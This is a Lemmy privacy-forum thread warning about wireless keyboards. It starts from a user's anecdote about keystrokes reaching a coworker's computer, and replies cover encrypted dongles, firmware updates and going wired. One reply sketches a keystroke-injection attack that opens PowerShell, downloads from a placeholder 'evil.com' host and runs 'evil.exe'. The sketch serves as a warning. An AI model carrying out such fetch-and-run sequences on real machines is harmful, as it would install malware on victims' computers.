Privacy

31876 readers

558 users here now

A place to discuss privacy and freedom in the digital world.

Privacy has become a very important issue in modern society, with companies and governments constantly abusing their power, more and more people are waking up to the importance of digital privacy.

In this community everyone is welcome to post links and discuss topics related to privacy.

Some Rules

Posting a link to a website containing tracking isn't great, if contents of the website are behind a paywall maybe copy them into the post
Don't promote proprietary software
Try to keep things on topic
If you have a question, please try searching for previous discussions, maybe it has already been answered
Reposts are fine, but should have at least a couple of weeks in between so that the post can reach a new audience
Be nice :)

Related communities

Chat rooms

[Matrix/Element]Dead
Discord

much thanks to @gary_host_laptop for the logo design :)

founded 5 years ago

MODERATORS

PSA: Stay away from wireless keyboards (beehaw.org)

submitted 1 year ago by black_mouflon@beehaw.org to c/privacy@lemmy.ml

40 comments fedilink hide all child comments

I aways wondered if the communication channel between my wireless keyboard and the usb receiver-antena is secure. I never bother to reseach this. Today I figured out the practical way. I turned on my pc at work and I tried to type the first letter of my password. Nothing hapened. Then I started spamming that letter. Still nothing, until the person next to me said "my keyboard is typing all by itself". It turns out she has a wireless mouse with a seemigly identical receiver-antena usb.

The moral of the story. If it was so easy to almost leak my password unintentionally due to this flaw of wireless keyboard communication, imagine wad a bad actor can do intentionally. Why try to brute force, social engineer e.t.c. when your password can be stollen in transit from your keyboard to your pc.

you are viewing a single comment's thread
view the rest of the comments

[–] skullgiver@popplesburger.hilciferous.nl 33 points 1 year ago* (last edited 1 year ago) (2 children)

This strongly depends on the brands you use. Unencrypted, automatically re-pairing devices are not normal, it just sounds like you and your coworker bought devices from questionable brands. Logitech keyboards and dongles encrypt key presses, for example. You do need to regularly check for firmware updates for both your keyboard and the receiver (sometimes vulnerabilities are found and despite the spyware Logitech wants to install onto your computer, these updates aren't done automatically) but they're generally quite safe.

Something perhaps more worrying: unencrypted keyboards will also let anyone in range inject keystrokes. A simple win+r, powershell.exe, wget http://evil.com, ./evil.exe could infect your computer if you look away for just five seconds.

These pages show how various brands deal with such security bugs: KeyJack Affected Devices, MouseJack Affected Devices. TL;DR, don't use anything from Microsoft or AliExpress/Amazon Basics and update your firmware.

[–] black_mouflon@beehaw.org 5 points 1 year ago* (last edited 1 year ago) (1 children)

Thanks. For what kind of specs I should be looking when byuing a wireless product? What key words I should be looking for?

[–] skullgiver@popplesburger.hilciferous.nl 3 points 1 year ago* (last edited 11 months ago) (1 children)

[This comment has been deleted by an automated system]

[–] black_mouflon@beehaw.org 3 points 1 year ago

I'll probably going to update to wired. It has all of the advanteges except portability. The only reason I got that wireless keyboard was that I needed something small, chaeap and portable.

[–] Pantherina@feddit.de 1 points 1 year ago (1 children)

Hmm, do you want a keyboard with firmware updates that encrypts keybresses....

Or simply use USB?...

[–] skullgiver@popplesburger.hilciferous.nl 1 points 1 year ago* (last edited 11 months ago)

[This comment has been deleted by an automated system]